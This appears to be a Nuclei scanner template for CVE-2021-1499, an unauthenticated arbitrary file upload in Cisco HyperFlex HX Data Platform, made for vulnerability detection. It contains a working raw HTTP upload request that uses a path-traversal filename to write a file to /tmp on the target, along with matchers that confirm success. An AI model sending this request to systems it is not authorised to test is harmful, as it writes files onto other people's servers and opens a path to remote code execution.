id: CVE-2021-1499 info: name: Cisco HyperFlex HX Data Platform - Arbitrary File Upload author: gy741 severity: medium description: Cisco HyperFlex HX Data Platform contains an arbitrary file upload vulnerability in the web-based management interface. An attacker can send a specific HTTP request to an affected device, thus enabling upload of files to the affected device with the permissions of the tomcat8 user. impact: | Allows an attacker to upload and execute arbitrary files on the target system remediation: | Apply the necessary security patches or updates provided by Cisco reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz - http://packetstormsecurity.com/files/163203/Cisco-HyperFlex-HX-Data-Platform-File-Upload-Remote-Code-Execution.html - https://nvd.nist.gov/vuln/detail/CVE-2021-1499 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 epss-score: 0.96404 epss-percentile: 0.9945 cpe: cpe:2.3:o:cisco:hyperflex_hx_data_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cisco product: hyperflex_hx_data_platform tags: fileupload,intrusive,packetstorm,cve,cve2021,cisco http: - raw: - | POST /upload HTTP/1.1 Host: {{Hostname}} Accept: */* Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 Origin: {{RootURL}} Referer: {{RootURL}} -----------------------------253855577425106594691130420583 Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" Content-Type: application/json MyPasswdNewData->/api/tomcat -----------------------------253855577425106594691130420583-- matchers-condition: and matchers: - type: word words: - '{"result":' - '"filename:' - '/tmp/passwd9' condition: and - type: word part: header words: - "application/json" - type: status status: - 200 # digest: 4a0a0047304502204779b8d3d0fbf12bc041d8f1fe573d8171945d3bb1eca81337ca66fe2caa56ae022100dfbb9af8e9d77e6937b1cf7e9acc47c248923fca2b02990a9f40301495dc5eea:922c64590222798bb761d5b6d8e72950